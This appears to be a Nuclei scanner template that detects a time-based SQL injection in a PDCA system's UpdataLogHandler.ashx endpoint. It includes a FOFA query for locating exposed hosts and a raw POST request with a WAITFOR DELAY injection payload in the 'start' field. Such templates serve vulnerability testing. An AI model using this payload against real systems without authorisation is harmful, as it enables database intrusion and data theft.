id: UpdataLogHandler-SQL

info:
  tags: UpdataLogHandler-SQL
  name: UpdataLogHandler-SQL
  author: xc
  severity: high
  description: UpdataLogHandler-SQL
  metadata:
    fofa-qeury: "PDCA/js/_publicCom.js"
    veified: true
    max-request: 1

http:
  - raw:
      - |
        POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded
 
        action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


               
    matchers:     
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=10 && contains(header,'text/plain')" 